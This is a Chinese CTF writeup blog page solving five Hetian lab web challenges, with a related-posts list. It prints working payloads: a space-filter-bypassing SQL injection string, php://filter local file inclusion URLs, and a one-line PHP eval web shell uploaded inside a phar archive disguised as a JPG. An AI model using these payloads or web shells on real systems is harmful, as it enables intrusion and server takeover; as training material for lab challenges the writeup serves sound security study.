合天网安 在线实验 CTF竞赛 writeup(第六周 | 套娃一样的上传、第二十一周 | 你的空格哪去了、第十周 | 试试协议吧、第十一周 | 签到般的包含、第九周 | 试下phpinfo吧)
文章目录
- 第六周 | 套娃一样的上传
- 第二十一周 | 你的空格哪去了
- 第十周 | 试试协议吧
- 第十一周 | 签到般的包含
- 第九周 | 试下phpinfo吧
第六周 | 套娃一样的上传
图片上传题目,看描述是要上传php脚本
修改后缀phtml,文件长度为17
flag{0000_0000_0000}
第二十一周 | 你的空格哪去了
空格被过滤,用/**/绕过,联合查询,构造
-1’union/**/select/**/1,flag,3/**/from/**/flag#
flag{63564494cac7097c}
第十周 | 试试协议吧
利用php://filter 协议读取flag.php的源码http://10.1.1.147:5010/index.php?file=php://filter/convert.base64-encode/resource=flag.php
ZmxhZyBpbiBoZXJlDQo8P3BocCAvL2ZsYWd7YWJkY18xMjM0X3F3ZXJfaGV0aWFufT8+解码得到flag
flag{abdc_1234_qwer_hetian}
第十一周 | 签到般的包含
Include.php
这个上传只能传图片后缀
<?php show_source(__FILE__); ///opt/flag3.txt @$file = $_GET["file"]; if(isset($file)) { if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70) { echo "
error!
"; } else { include($file.'.php'); } } ?> <?php @eval($_POST['a']);?>写一个php文件,压缩,改后缀jpg
然后利用phar伪协议读取压缩流,包含php木马文件
提示flag在///opt/flag3.txt
flag{whoami_hetianlab_student}
第九周 | 试下phpinfo吧
http://10.1.1.147:5009/?lang=php://filter/convert.base64-encode/resource=…/phpinfo.php
flag{abcd_hetianlab_1234_qwer}
合天网安 在线实验 CTF竞赛 writeup(第六周 | 套娃一样的上传、第二十一周 | 你的空格哪去了、第十周 | 试试协议吧、第十一周 | 签到般的包含、第九周 | 试下phpinfo吧)相关推荐
- 合天网安 在线实验 CTF竞赛 writeup(第七周 | 再见上传、第八周 | 随意的上传、第十三周 | simple xxe、第十五周 | 回显的SSRF)
文章目录 第七周 | 再见上传 第八周 | 随意的上传 第十三周 | simple xxe 第十五周 | 回显的SSRF 第七周 | 再见上传 <?php @eval($_POST['g']); ...
- 合天网安 CTF之第六周-套娃一样的上传
合天网安 CTF之第六周-套娃一样的上传 一.实验目的 本实验无writeup,需要同学们发挥自己所学,拿下最终目标 二.实验环境 目标机:Centos7 IP地址:10.1.1.147:5006 攻 ...
- CTF套娃一样的上传
套娃一样的上传 合天网安实验室第六周实验解题思路 (这是小编在CSDN上发的第一篇文章,同时也是一个CTF小白,主要讲一下这题的解题思路.) 攻击机:Windows10 IP地址:随机分配 目标机:C ...
- 合天网安weekly系列ctf实战 | 第八周 | 随意的上传wp
第八周 | 随意的上传 打开题目 看到题目首先想到的是上传一句话木马用菜刀连接 写入一句话木马上传成功,但有字符被过滤 尝试使用js绕过 上传成功 连接上菜刀,根据提示在/var/www/html目录 ...
- BurpSuite实战——合天网安实验室学习笔记
burpsuite是一款功能强大的用于攻击web应用程序的集成平台,通常在服务器和客户端之间充当一个双向代理,用于截获通信过程中的数据包,对于截获到的包可以人为的进行修改和重放. 此BurpSuite ...
- 【合天网安】FCKeditor 2.4.3文件上传漏洞
[合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...
- 合天网安就业班_CTF挑战赛-合天网安实验室
[TOCCTF挑战赛-合天网安实验室逆向解析] CTF挑战赛-合天网安实验室sourl.cn 1.逆向100 修改后缀为.apk 安卓模拟器打开,发现要求输入Password 用Android逆向助 ...
- 合天网安实验室CTF-Steg150-一段欢快的曲调
合天网安实验室CTF-Steg150-一段欢快的曲调 题目描述 滴滴 相关附件 stego100.wav 题目链接 参考解题步骤 1.下载的附件是一段wav格式的音频,打开听了一下,确实是欢快 ...
- 合天网安实验室CTF-基础50-0x01
合天网安实验室CTF-基础50-0x01 最近无聊时准备刷点题,由简到难慢慢来吧 题目描述 真的不能再简单了! 相关附件 misc50.zip 题目链接 参考解题步骤 1.下载下来的压缩包解压 ...
最新文章
- Leetcode: Maximal Rectangle
- python学习笔记3—流程控制if、for、while
- SLF4J简介与使用(整合log4j)
- 关于Kubernetes的常见问题
- [转]分布式中Redis实现Session终结篇
- 博文视点大讲堂第29期——2天玩转单反相机
- Java同步数据结构之Collection-Queue
- MacOS Big Sur 11.5.2 (20G95) OC 0.7.2 / Cl 5138 / PE 三分区原版黑苹果镜像
- 漏洞复现-——通达OA任意用户登陆漏洞
- 添加分类、标签云(球状)、彩色标签
- nginx-http重定向到https配置
- 我国跨国企业外汇风险管理——以海尔公司为例
- 用java实现螺旋矩阵算法
- win10右键卡死/导航栏点击文件夹图标无法弹出资源管理器/右键cmd以管理员身份运行无反应
- spring mvc处理异常
- 机器学习-有监督无监督
- C语言中的stdbool.h头文件
- 机器学习之一:什么是机器学习?
- dell笔记本安装桌面版 ubuntu系统
- 今日记录:JIRA使用指南